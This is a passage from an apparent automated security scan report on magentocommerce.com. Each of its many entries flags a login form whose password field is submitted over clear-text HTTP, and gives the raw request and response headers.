Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.14. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.15. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.16. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.17. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.18. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.19. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.20. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.21. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.22. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.23. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.24. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.25. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.26. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.27. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
